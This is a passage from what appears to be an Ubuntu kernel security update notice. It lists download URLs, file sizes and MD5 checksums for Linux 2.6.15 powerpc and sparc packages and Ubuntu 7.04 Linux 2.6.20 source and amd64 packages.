http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-52_2.6.15-52.67_powerpc.deb\n      Size/MD5:  6943480 1258b9362939477454f7261a4c13d890\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-52-powerpc-smp_2.6.15-52.67_powerpc.deb\n      Size/MD5: 22774270 3bfefe03a694939bae93a233b64d1f6b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-52-powerpc64-smp_2.6.15-52.67_powerpc.deb\n      Size/MD5: 23664326 5b31b6d396b849636292e7043a4611a6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-52-powerpc_2.6.15-52.67_powerpc.deb\n      Size/MD5: 22348144 5213ef717d34a6d8bb4f506f0fec3b26\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:    17780 b0e265505fb1bd0453d03edb2cb5426f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:    17372 cdd2956b96258f82dbb8f668b464e37c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:   261264 1975724b533e96481dd6906fc384a0ff\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:   282496 f62273e6089393c90ea51b6f95218280\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:   227454 dbc3fe1f8d75dd2973446141b925ce2a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:   248664 64c26003076ca1201d79313688cc7039\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:  1048458 ffc37e2c7ed2f294a02c250e689b54a2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:  1048580 22a6b57fc17ec95380e8f2f4d72b0af6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:  1737720 462902297ae37f6e081d6b48e45de15a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:  1877414 5c369eb9af92233f54092b7cf2825507\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:   250930 faac4c4f3b46c3ec3b6bc8e04d800748\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:   233674 594d3e744920b4e6cd776b7f20515d49\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:    13032 c01ba80cd1249d8af8819276f46d1c5e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:    13522 7693bec428e9a07f30070db7df241e89\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:    84832 4b8ed4a1b5096797af1c01f42cf1312a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:    52186 c9f8e4dbc56681db68d0b1b182c00fbc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:    73924 03a0e9b0752b8b8580b9952cd2fba4f4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:    85838 34bc729811018bd09664fcfeb9d03db6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:     6614 9fd2a1d6903afe55930f6669a04cd114\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:     7062 e56de4812f4da9b9e1c4741fb5066fdf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:    60358 df0a203e8212f473557900df240a9d50\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:    70346 c242bb51750263d67282f2bfcab2ac3a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:   128538 117433fce2532d394c1b474367c71e6a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:   157788 d7e5c445c7af7f110588c2bc9f0fb29b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:   108036 2815ba8053c87b229ac39933295e2f11\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:   126056 7e632cf1ae8fe20130ec287c454dcabf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:    87298 60c6c5d3144579569de99ff84450790f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:    93304 1951df808f7bc6ae0c36c17bf9fe4b10\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:  2013954 7d06ed44aa7beb09a1eb08efb541025f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:  1988040 32ec754026d6f8f6ab81dcfaef222b82\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:   104106 9af2db11a4ff42e09bab375304b42bbc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:   115698 8849c21b901df3bd1a8c920ea7a1324e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:    12734 41664c2c832d96647ee317ff21cb782f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:    14432 896df8d28f56e236b1a520140829d353\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:    39948 108a2f64b5b0b0d4faa9c40c76281a1e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:    41464 5f919e671b76f55b57c9d5e0ef79f18e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:   149316 ffbd1581cbd0e311836a81dd758ee03a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:   168082 74195d6b16d3f930bb8a6a4c10340463\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:    42262 925d969199a9002cd81156d4cc3b899f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:    44862 1582101a87737c696a538ed0d92fe264\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:   320286 ca366a6cd2422bba2ce24e6a8935b4da\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:   324716 ee0f3870540ef254de0d9378c66397e3\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/linux-restricted-modules-2.6.15-52-powerpc-smp_2.6.15.12-52.3_powerpc.deb\n      Size/MD5:  1340274 d3c1ea04d4a5f99b3de867f55e0159b1\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/linux-restricted-modules-2.6.15-52-powerpc_2.6.15.12-52.3_powerpc.deb\n      Size/MD5:  1335414 6f90faf30c0f0f8dabacd51929cfd0cf\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/nic-restricted-firmware-2.6.15-52-powerpc-di_2.6.15.12-52.3_powerpc.udeb\n      Size/MD5:   798764 4071886c6215c22e4496ab9b8cdfd0e2\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/nic-restricted-modules-2.6.15-52-powerpc-di_2.6.15.12-52.3_powerpc.udeb\n      Size/MD5:   508404 77282618d7de69192b3454dc6a755413\n\n  sparc architecture (Sun SPARC/UltraSPARC):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/linux-backports-modules-2.6.15-52-sparc64-smp_2.6.15-52.10_sparc.deb\n      Size/MD5:   186944 deac3ddc394261c31894b2b350b491d9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/linux-backports-modules-2.6.15-52-sparc64_2.6.15-52.10_sparc.deb\n      Size/MD5:   185516 b815ad36987028ff6dcf8e0889e48ae3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/nic-updates-modules-2.6.15-52-sparc64-di_2.6.15-52.10_sparc.udeb\n      Size/MD5:   100670 eb4ab70462b50bcf7e614b4b03b88760\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/scsi-updates-modules-2.6.15-52-sparc64-di_2.6.15-52.10_sparc.udeb\n      Size/MD5:   105832 23739442c690623b0070062ee0ab255a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-52-sparc64-di_2.6.15-52.67_sparc.udeb\n      Size/MD5:    50464 2b4cbadad1f1a9b25d98994fd2ef9ad3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-52-sparc64-di_2.6.15-52.67_sparc.udeb\n      Size/MD5:     2352 177ea4a5a957fc0af1009f43f5675c47\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-52-sparc64-di_2.6.15-52.67_sparc.udeb\n      Size/MD5:    40322 ff3a3117839dd36e8b625ef60863e52a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-52-sparc64-di_2.6.15-52.67_sparc.udeb\n      Size/MD5:   110518 e1aa12134ab3fa21bda1a1b87af00703\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-52-sparc64-di_2.6.15-52.67_sparc.udeb\n      Size/MD5:    41170 5176277d9c10e5a6714353953d08db38\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-52-sparc64-di_2.6.15-52.67_sparc.udeb\n      Size/MD5:   104232 5db5dfeaa4b8550bd7eececbd765e104\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-52-sparc64-di_2.6.15-52.67_sparc.udeb\n      Size/MD5:     7432 f7d3b9cb1c8b1a80e8570a8f6a24ef29\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-52-sparc64-di_2.6.15-52.67_sparc.udeb\n      Size/MD5:   149016 4099cb20f575606ad7bcad3ec54e5916\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-52-sparc64-di_2.6.15-52.67_sparc.udeb\n      Size/MD5:  1707920 68bbd4cda5113476731a2b74cb51dce9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-52-sparc64-smp_2.6.15-52.67_sparc.deb\n      Size/MD5:   768974 08ae76621d41766c99741d3c2fe36109\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-52-sparc64_2.6.15-52.67_sparc.deb\n      Size/MD5:   764708 14b683cf3884a8117ad68198ea996861\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-52_2.6.15-52.67_sparc.deb\n      Size/MD5:  6958650 b471540d77edfdf4d81a6168ed3d1910\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-52-sparc64-smp_2.6.15-52.67_sparc.deb\n      Size/MD5: 15003738 10899c77cec105edf1f8a9fbe29b9244\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-52-sparc64_2.6.15-52.67_sparc.deb\n      Size/MD5: 14821832 a451316e0b171f1cacad49e94638e03d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-52-sparc64-di_2.6.15-52.67_sparc.udeb\n      Size/MD5:     7420 77f554ffc62be87d34ca5b82dc2ac6f4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-52-sparc64-di_2.6.15-52.67_sparc.udeb\n      Size/MD5:   248676 31f51fe66bf5f1eea3555ceae5be642c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-52-sparc64-di_2.6.15-52.67_sparc.udeb\n      Size/MD5:   212258 bdbd80ea31dd1eda1b2dcf3f4b321706\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-52-sparc64-di_2.6.15-52.67_sparc.udeb\n      Size/MD5:  1048456 c9fb8123dfe5103239b40e775e21ee57\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-52-sparc64-di_2.6.15-52.67_sparc.udeb\n      Size/MD5:  1481828 e82ed81cf6cd3bf54fea8055e5c28043\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-52-sparc64-di_2.6.15-52.67_sparc.udeb\n      Size/MD5:    10118 67cd4cc9006195c5d51a36b931daafd5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-52-sparc64-di_2.6.15-52.67_sparc.udeb\n      Size/MD5:    40178 562aa33225baf0ec83caafdfe73423e6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-52-sparc64-di_2.6.15-52.67_sparc.udeb\n      Size/MD5:     9360 aa8331b3eaa227b21172bef6a2cc6d99\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-52-sparc64-di_2.6.15-52.67_sparc.udeb\n      Size/MD5:    61434 ca7a64fe2897c1fd0222d296b2f80ac8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-52-sparc64-di_2.6.15-52.67_sparc.udeb\n      Size/MD5:   163010 85b771d6fdc6b1169d5ab763ae942e0f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-52-sparc64-di_2.6.15-52.67_sparc.udeb\n      Size/MD5:    63986 4f889a61f86c3d809e47bce1b48b4aee\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-52-sparc64-di_2.6.15-52.67_sparc.udeb\n      Size/MD5:  1235084 542ba4933f965846516690eea419dec8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-52-sparc64-di_2.6.15-52.67_sparc.udeb\n      Size/MD5:    59350 8342814c277e3041b900a770bb45b59f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-52-sparc64-di_2.6.15-52.67_sparc.udeb\n      Size/MD5:    37396 844833e2c84f080810e27fa65e7caba0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-52-sparc64-di_2.6.15-52.67_sparc.udeb\n      Size/MD5:   280070 bc70d76611118d743bd7a3e4895e373b\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/linux-restricted-modules-2.6.15-52-sparc64-smp_2.6.15.12-52.3_sparc.deb\n      Size/MD5:   828134 ff32a8aa76a07003aae33dc835fae59f\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/linux-restricted-modules-2.6.15-52-sparc64_2.6.15.12-52.3_sparc.deb\n      Size/MD5:   828052 81fa3eb580ecc71da7da9e6e9a34775a\n\nUpdated packages for Ubuntu 7.04:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.20/linux-backports-modules-2.6.20_2.6.20-17.12.dsc\n      Size/MD5:     1830 ee053f39bcc59b701002b82a2f1142b7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.20/linux-backports-modules-2.6.20_2.6.20-17.12.tar.gz\n      Size/MD5:   214716 a4ba6d17d1ca9fc3919d6a93c3b93006\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-source-2.6.20_2.6.20-17.36.diff.gz\n      Size/MD5:  1605830 f97c70596b4a1c07a42a1f7459c5470b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-source-2.6.20_2.6.20-17.36.dsc\n      Size/MD5:     2472 6f8fb4f7127a66e87321c19a4853f91b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-source-2.6.20_2.6.20.orig.tar.gz\n      Size/MD5: 62174876 f19203b2488d943a640abe8f3cd20f57\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/linux-restricted-modules-2.6.20_2.6.20.6-17.31.diff.gz\n      Size/MD5:   107789 78e768b26348b89c3990418e43ac1a82\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/linux-restricted-modules-2.6.20_2.6.20.6-17.31.dsc\n      Size/MD5:     2683 db1ca1e3fe165edb5686d5c72e5cecab\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/linux-restricted-modules-2.6.20_2.6.20.6.orig.tar.gz\n      Size/MD5: 139814900 ab2c852e27c86d11d0156920ca5f8d56\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-doc-2.6.20_2.6.20-17.36_all.deb\n      Size/MD5:  4878228 eb8bdcbfc83b2bb63fd8b89fdbddcc1e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-kernel-devel_2.6.20-17.36_all.deb\n      Size/MD5:    86074 51908b87928f5c45caa9e653cd23621e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-source-2.6.20_2.6.20-17.36_all.deb\n      Size/MD5: 47829976 380a8bbde35a67a38600479e12ced4f5\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/linux-restricted-modules-common_2.6.20.6-17.31_all.deb\n      Size/MD5:    21782 cb5f5829ce6104fbb47192ee619c3865\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.20/linux-backports-modules-2.6.20-17-generic_2.6.20-17.12_amd64.deb\n      Size/MD5:    84016 046b408466c3ad9cb2963634c15fcaf7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.20/linux-backports-modules-2.6.20-17-server_2.6.20-17.12_amd64.deb\n      Size/MD5:    83900 c077d33308773f0d98c7270f631148ec\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.20/updates-modules-2.6.20-17-generic-di_2.6.20-17.12_amd64.udeb\n      Size/MD5:    84310 e0063a1e0ac8cd869577ff79e34f0498\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/acpi-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb\n      Size/MD5:    24498 83d220d8424f7f5dd858a804198d9505\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb\n      Size/MD5:   202082 4c0872eb2c550fe8de39973db0d98e8e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb\n      Size/MD5:    39354 2591f7379f4e296433ed8bfead9e2b95\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fb-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb\n      Size/MD5:    50908 928fd03a9ccc2edeb8504d4dd9e47633\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb\n      Size/MD5:   187506 f6bf3e342f0263535c9ca41f410a8fa9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/floppy-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb\n      Size/MD5:    34910 dcc7af80943547b0f75299ee5dee5d37\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb\n      Size/MD5:   644402 d695410618b99ae784fbee8fe1c72345\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb\n      Size/MD5:   174670 177a305dfc124bb636fd2d5acc663af9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb\n      Size/MD5:    76422 080143b9afe7d15f3e59095535394ce7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb\n      Size/MD5:    57888 fc2d61caa7ed5d30e101a102989bc51e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb\n      Size/MD5:   140010 c608eb9689d31f285c8fc2e2b92d4858\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/irda-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb\n      Size/MD5:   277468 35d83db663c60bf2171279255ca65145\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb\n      Size/MD5:  1904118 1c3f6df9f72926afe461cca5b6926aaf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-17-generic_2.6.20-17.36_amd64.deb\n      Size/MD5:   857786 3a3284f60874c75d4641b22cc1034fbe\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-17-lowlatency_2.6.20-17.36_amd64.deb\n      Size/MD5:   857068 8f055119b227038a319b0d1bc6298001\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-17-server_2.6.20-17.36_amd64.deb\n      Size/MD5:   856470 cded6b39e168be3a267c377744242113\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-17_2.6.20-17.36_amd64.deb\n      Size/MD5:  8130814 e225cd619d90a28cd2a06448e94fbac1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-17-generic_2.6.20-17.36_amd64.deb\n      Size/MD5: 23065906 0bb094b3e3e33dd870d11a24264bebec\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-17-server_2.6.20-17.36_amd64.deb\n      Size/MD5: 23388296 6e4364f4c3e0c83b9227333a63273efb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-17-generic_2.6.20-17.36_amd64.deb\n      Size/MD5: 18428992 bfb0e2d482378ce4fd82314938976d14\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-17-server_2.6.20-17.36_amd64.deb\n      Size/MD5: 18702670 84607703fab1742f0cc794012047413e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-libc-dev_2.6.20-17.36_amd64.deb\n      Size/MD5:   669118 d9c3d7bfb62b823d98b17c0b5808747e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb\n      Size/MD5:   246430 e1adefaf889dd8b6f7d893cf9ba6e72a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb\n      Size/MD5:   144482 79e0151386812271e8842e22e1e53e85\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb\n      Size/MD5:   225134 4fd97d2c39caa88726f4c8f3e69c3af0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb\n      Size/MD5:  1110528 4a3d2217a7cc1f0ab1d5c871d380e0fd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb\n      Size/MD5:  1754794 dd8aa6f7e4887a33835894b72b830f57\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-pcmcia-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb\n      Size/MD5:   140910 716411a33647dacbb9d6f36987616414\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb\n      Size/MD5:   163384 a9453d5d98d01dacb394f08b974bc5e9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb\n      Size/MD5:   265716 e9d69ef9af3e1b382ed7a93447d54246\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb\n      Size/MD5:    34300 387b7ce88b201bf30fd85094dacce3cb\n    